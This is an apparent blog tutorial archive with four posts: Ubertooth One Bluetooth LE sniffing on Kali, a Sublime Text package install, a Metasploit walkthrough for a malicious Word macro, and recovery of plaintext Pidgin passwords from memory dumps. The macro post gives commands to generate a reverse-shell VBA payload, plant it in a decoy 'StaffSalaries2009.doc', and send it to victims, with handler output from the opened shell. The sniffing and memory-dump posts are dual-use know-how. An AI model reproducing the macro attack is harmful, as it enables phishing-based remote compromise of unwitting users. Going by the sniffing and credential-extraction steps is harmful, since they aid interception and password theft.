Category Archives: Tutorial

Setting up Ubertooth One – Kali

Install essential packages and updates
Login to Kali as root/toor
apt-get update
apt-get install kali-linux-sdr
apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config libpcap-dev python-numpy python-pyside python-qt4 libgtk2.0-dev libusb-dev bluez

Install the Bluetooth baseband decoding library
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-10-R1.tar.gz -O libbtbb-2015-10-R1.tar.gz
tar xf libbtbb-2015-10-R1.tar.gz
cd libbtbb-2015-10-R1
mkdir build
cd build
cmake ..
make
make install
ldconfig

Install Ubertooth tools
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-10-R1/ubertooth-2015-10-R1.tar.xz -O ubertooth-2015-10-R1.tar.xz
tar xf ubertooth-2015-10-R1.tar.xz
cd ubertooth-2015-10-R1/host
mkdir build
cd build
cmake ..
make
make install
ldconfig

Visualizing the 2.4 GHz spectrum
git clone https://www.kismetwireless.net/spectools.git
cd spectools
./configure
make
make install
spectool_gtk

The last command will open up WiSPY, click on the “Open Device”, select “Ubertooth One USB”, click on Enable, if you don’t see anything anything on the three Views (Spectral, Topo, Planar) try physically disconnecting and reconnecting Ubertooth-One.

Activity is In-Progress – File is downloading.

Activity is done – File download is completed.

Determine the installed firmware version
#ubertooth-util -V
ubertooth 2015-10-R1 (dominicgs@hydrogen) Mon Oct 12 22:30:57 BST 2015

Known Limitations
The BLE sniffer can only scan 1 Advertisement Channel at a time, out of the 3 (channel 37 on 2402 MHz, channel 38 on 2426 MHz and channel 39 on 2480 MHz). This is a hardware limitation since the Ubertooth has only one narrowband radio chip (the CC2400) and can only tune to a single frequency at a time. So when sniffing the BLE Advertisement channels you have 33.3% chances being on the correct channel for a specific connection. The solution to this issue is to keep trying until you get lucky enough to be on the right channel at the right time, or get 3 Ubertooth dongles each one tuned to monitoring 1 of the Advertisement Channels.

Sniff Bluetooth LE Packets
1. Using the default linux Bluetooth utilities: # /etc/init.d/bluetooth restart && hcitool dev && hcitool scan
2. Using the ubertooth-scan from Ubertooth utilities: # ubertooth-scan -b hcil -t 40 -x
3. Using the ubertooth-btle from Ubertooth utilities (capture Bluetooth LE (Low Energy)) in promiscuous mode:
# ubertooth-btle -p
Sample output:
systime=1481409606 freq=2440 addr=f605c0cd delta_t=24.492 ms
61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db 18 4c 52 6f c8 0d
Data / AA f605c0cd (valid) / 28 bytes
Channel Index: 17
LLID: 1 / LL Data PDU / empty or L2CAP continuation
NESN: 0 SN: 0 MD: 0

Data: ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b
CRC: c9 d2 67

4. Using the ubertooth-btle again, but this time save the traffic in a PCAP file for post-examination:
# ubertooth-btle -p -c /tmp/capture.pcap

5. Using the ubertooth-btle again, observe in realtime (you have 1 in 3 chances of being on the correct advertising channel, due to the Known Limitation described earlier):
# mkfifo /tmp/fifopipe0
# ubertooth-btle -f -c /tmp/fifopipe0 &

Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0” | click Save | click Close | click “Start”

or, launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 &

6. In case you have 3 Ubertooth devices you can overcome the limitation, described in “Known Limitation” section and monitor all 3 Advertisement channels:

# mkfifo /tmp/fifopipe0 && mkfifo /tmp/fifopipe1 && mkfifo /tmp/fifopipe2
# ubertooth-btle -U0 -A37 -f -c /tmp/fifopipe0 &
# ubertooth-btle -U1 -A38 -f -c /tmp/fifopipe1 &
# ubertooth-btle -U2 -A39 -f -c /tmp/fifopipe2 &

then, either launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 -i /tmp/fifopipe1 -i /tmp/fifopipe2 &

or,
Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0”, repeat for “/tmp/fifopipe1” and “/tmp/fifopipe2” | click Save | click Close | click “Start”

Viewing Bluetooth Packets in Wireshark
# wireshark /tmp/capture.pcap
go to Edit | Preferences | Protocols | select DTL_USER and click on Edit… | click on “+” to add | Ensure the new value reads “User 0 (DLT=147)” | in the “Payload protocol” column enter “btle”| OK | OK

Useful Wireshark filters
1. Connection requests and non-zero data packets:
btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05

2. Ignore empty PDU (Keep-alive packet):
not btle.data_header.llid==0001

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

Syntax highlight support for NASM x86 Assembly code in Sublime Text 3

Open Sublime Text 3 console using shortcut: ctrl+` and then paste the below code following by Enter:

import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a3098092775ccb37ca9d6b2e4b7d'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by)

See also code in Sublime Text Console window:
sublime.a

Then tap Shift+Cmd+p and type “package control: install package”, select and press the Enter key:
sublime.b

in the textarea type in “NASM x86 Assembly” select the first (and one) from list result to add the package:
sublime.c

Last, open your assembly file and Sublime Text 3 menu, select View | Syntax | Assembly (x86) NASM and enjoy the colored syntax.

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

The MS Office, a Macro and a Shell

In this post we will go through the steps to create a VBA (Visual Basic for Applications) payload using Metasploit Framework and stick that into a Microsoft Office Word 2003 document. When the target users open up the document we will get a command line prompt. The process is divided in four parts.

Part1 – Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V> /var/www/win.sh_rev_tcp.1.108-5000.txt

Part2 – Attacker’s end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

[pentester waits here for victim to eat the bait…once file is opened a shell is spawned as follows]

[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo

Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation


C:\Documents and Settings\Administrator>


Part3 – Wrap bait into Office Word document
a. First, we need to copy the contents of file win.sh_rev_tcp.1.108-5000.txt, generated in Part1 over to our Windows machine. Having a web server at the Linux site is always handly, we just opening up Firefox and pointing to http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document, named it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon, the area where you should paste the code will popup in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon at the toolbar, do File | Close and Return to Microsoft Word
g. Add some data to your fishie document so to look genuine, Save and Exit
h. Distribute the document and hold back

* The above also apply for Office Excel documents, however please note that the generated Visual Basic code should be saved into ThisWorkbook item instead of ThisDocument, as per instruction d.

Part4 – Distribution etc
Having done all these, you can send the file as an attachment or save to a shared area where your victims can spot it and fire it up, if their Macro Security (Tools | Macro | Security… ) level is set to low your goal will be achieved instantly. In any other case the users will get a friendly message telling them “The macros in this project are disabled. Please refer to the online help or documentation of the host application to determine how to enable macros.” with an OK and Help button, pressing the Help button tells them exactly where to click so to enable macros.

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

IM Memory Dumping (cont.)

(You may want to read first IM Memory Dumping)

According to Wikipedia on April 6th 2007, GAIM’s project development team changed the name of the popular IM to Pidgin, as a result of their settlement with AOL and latter’s trademarked acronym AIM. So we downloaded Pidgin’s latest version 2.5.5 and installed it in our VMware Windows box. We happily added our demo username and password (for our test it does not matter if you tick the box saying remember password, or not, as there is no change in the result of our experiment). Then we dumped Pidgin’s process memory, saved it to a file in our Samba share, the file consumed about 50MB of space. From there, using the strings command we searched for sequences of printable characters; by grep-ing for our set password we found three instances of it in different places (all of them of course in plaintext).

We changed our account password a few times and repeated the process again and again, last we concluded that:
1. every time the password was stored three times in the process memory
2. one of the locations is very easily spotted in the dump (if you view the file with a Hex editor you will see that there is always a large block of random data then the string =p&=, then some random numbers (which they do not always appear) and finally our password). As you understand even if you do not know the secret password you can find it by trial and error in just a few tries.

I guess that other IM clients is very likely to store your passwords amongst other information in clear. I can not tell you do not use program X or program Y because they do not properly encrypt your passwords or do not scrub the memory, but I can advise you to take under serious consideration which ones you do use at home and work, and think how much exposed you are.

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather